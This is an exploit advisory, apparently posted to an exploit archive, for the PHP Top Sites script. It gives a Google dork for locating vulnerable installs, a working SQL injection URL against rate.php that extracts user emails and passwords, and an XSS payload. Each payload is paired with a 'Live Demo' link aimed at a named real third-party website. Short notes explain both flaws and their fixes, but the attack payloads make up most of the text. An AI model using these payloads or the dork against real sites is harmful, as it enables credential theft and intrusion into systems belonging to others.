PHP Top Sites suffers from cross-site scripting and remote SQL injection vulnerabilities.
c8192bcf03e28e2a7361ecccc26e001882bc9dc6962685702841213293c057d1
<------------------- header data start ------------------- >
#############################################################
PHP Top Sites Multiple SQL/XSS Vulnerabilities
#############################################################
# Author : kAsvææ | c0de Hunters
# Name : PHP Top Sites
# Bug Type : SQL/XSS
# Version :All
# Google Dork:"Powered By PHP TopSites"
# Home Page : http://itop10.net/
# You can download it : http://webscripts.softpedia.com/script/Top-Sites/PHP-TopSites-41994.html
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
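SQL : "rate.php" (string-based SQL injection through the "site" GET parameter, which appears to be placed inside a quoted SQL string without escaping; the fix is to bind "site" as a parameter in a prepared statement)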
[EXPLOIT] : rate.php?site=-999.9%27%20UNION%20ALL%20SELECT%20%28SELECT%20concat%280x7e,group_concat%28top_user.email,0x7e,top_user.password%29,0x7e%29%20FROM%20%60topfunsites_com_-_topsites%60.top_user%29%20,null%20and%20%27x%27=%27x
[Live Demo] : http://www.topfunsites.com/topsites/rate.php?site=-999.9%27%20UNION%20ALL%20SELECT%20%28SELECT%20concat%280x7e,group_concat%28top_user.email,0x7e,top_user.password%29,0x7e%29%20FROM%20%60topfunsites_com_-_topsites%60.top_user%29%20,null%20and%20%27x%27=%27x
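XSS : "rate.php" (the "site" GET parameter appears to be written into the HTML response without output encoding; the fix is to HTML-encode the value wherever it is printed)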
[EXPLOIT] : rate.php?site="'><script>alert('xss')</script>
[Live Demo] : http://www.topfunsites.com/topsites/rate.php?site=%22%27%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
< -- bug code end of -- >